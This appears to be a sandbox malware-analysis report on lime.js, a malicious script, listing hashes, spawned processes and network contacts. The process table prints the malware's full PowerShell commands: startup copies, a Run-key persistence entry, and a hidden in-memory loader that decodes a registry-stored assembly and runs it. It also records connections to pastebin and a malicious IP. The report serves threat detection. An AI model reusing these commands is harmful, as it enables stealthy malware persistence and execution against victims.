Field | Value
---|---
File name | lime.js
Full analysis | https://app.any.run/tasks/0a4f05ee-7534-4d4c-b97b-9bd4923c6d1e
Verdict | Malicious activity
Analysis date | August 13, 2019, 16:30:08
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators | 
MIME | text/plain
File info | ASCII text, with very long lines, with CRLF line terminators
MD5 | 1E89379F34AAFD46CE829499E73042AF
SHA1 | 48316579C2E8902411B45C1A9545F4FAB8E87F0F
SHA256 | 9674359F0C4DB134EE806D70C2E7E869A3FBA74389D3A1C3E85C61BFD719C54A
SSDEEP | 768:TlbXyDfW7QxO0cKtmUpwbT0pEqapHCE0nY:TlbXyDfW7QxOnKEUpwbOQr

PID | CMD | Path | Indicators | Parent process
---|---|---|---|---
2396 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\lime.js" | C:\Windows\System32\WScript.exe | — | explorer.exe
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft ® Windows Based Script Host; Exit code: 0; Version: 5.8.7600.16385 | | | |
2388 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\lime.js',[System.IO.File]::ReadAllText('C:\Users\admin\AppData\Local\Temp\lime.js'));wscript 'C:\Users\admin\AppData\Roaming\lime.js'" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WScript.exe
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |
3044 | "C:\Windows\system32\wscript.exe" C:\Users\admin\AppData\Roaming\lime.js | C:\Windows\system32\wscript.exe | — | powershell.exe
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft ® Windows Based Script Host; Exit code: 0; Version: 5.8.7600.16385 | | | |
4044 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\admin\AppData\Roaming\lime.js' -PropertyType String -Force;" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wscript.exe
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |
2160 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\lime.js',[System.IO.File]::ReadAllText('C:\Users\admin\AppData\Roaming\lime.js'))" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wscript.exe
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |
2804 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wscript.exe
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |

PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
2388 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QB9PK0GYGCE7HL20JL22.temp | — | — | —
4044 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RQA81CUN506TIXW0ZT8A.temp | — | — | —
2160 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZQCSOVQJ1PACDJLE5D3U.temp | — | — | —
2804 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GQRU1ZDFKUHPRN409YIQ.temp | — | — | —
4044 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | A25A3218432767D044A42DFB20430D13 | 89B8F26BBB4687757C87D5EF3D77646AF493AFFCF68B572BD2D4D5CE07C97BE7
2388 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF379e57.TMP | binary | A25A3218432767D044A42DFB20430D13 | 89B8F26BBB4687757C87D5EF3D77646AF493AFFCF68B572BD2D4D5CE07C97BE7
2804 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | A25A3218432767D044A42DFB20430D13 | 89B8F26BBB4687757C87D5EF3D77646AF493AFFCF68B572BD2D4D5CE07C97BE7
2804 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF37a349.TMP | binary | A25A3218432767D044A42DFB20430D13 | 89B8F26BBB4687757C87D5EF3D77646AF493AFFCF68B572BD2D4D5CE07C97BE7
2388 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | A25A3218432767D044A42DFB20430D13 | 89B8F26BBB4687757C87D5EF3D77646AF493AFFCF68B572BD2D4D5CE07C97BE7
2160 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | A25A3218432767D044A42DFB20430D13 | 89B8F26BBB4687757C87D5EF3D77646AF493AFFCF68B572BD2D4D5CE07C97BE7

PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2804 | powershell.exe | 104.20.209.21:443 | pastebin.com | Cloudflare Inc | US | shared |
2804 | powershell.exe | 193.56.28.134:9505 | — | — | — | malicious |

Domain | IP | Reputation
---|---|---
pastebin.com | | shared
dns.msftncsi.com | | shared